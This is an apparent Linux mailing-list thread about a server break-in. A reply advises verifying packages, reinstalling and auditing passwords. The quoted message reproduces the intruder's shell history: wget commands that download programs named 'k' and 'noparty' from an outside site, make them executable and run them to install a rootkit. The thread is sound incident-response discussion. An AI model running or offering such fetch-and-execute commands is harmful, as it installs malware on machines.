I think nuclear weapons would be a good way to handle cracking sites, crackers, and spammers. (just kidding :-) Seriously, try running "rpm --verify" on your system to verify that your system files are intact, or find out which aren't. But in the end, if your system has been compromised, a fresh reinstall is the only way to know that there are no hidden problems on the machine. Stick a temporary machine in it's place to handle server duties, but I'd consider that machine toast. As an aside, if a machine is handling company server duties, I won't put any user accounts on it except for admins (I don't know that the user you mentioned wasn't an admin, but just in case). Also, I'd run "crack" or "john" or some password cracking program to test the passwords used, to make sure they weren't too easy. You have my sympathies. Having a machine cracked just makes me feel sick. :-( HTH, Kevin Antun Balaz wrote:
Thanks again for helpful information.
New question: According to the history file of user whose account was used for intrusion, rootkit was downloaded from www.cappy.biz:
cat /etc/issue wget www.cappy.biz/0/*/k chmod +x k ./k wget www.cappy.biz/0/*/noparty chmod +x noparty ./noparty etc. etc.
Directory http://www.cappy.biz/0/*/ is very interesting. Can we somehow act against the owner of this site, so that the same thing doesn;t happen to other SuSE users?
Best regards,
Antun Balaz Institute of Physics, Belgrade Serbia and Montenegro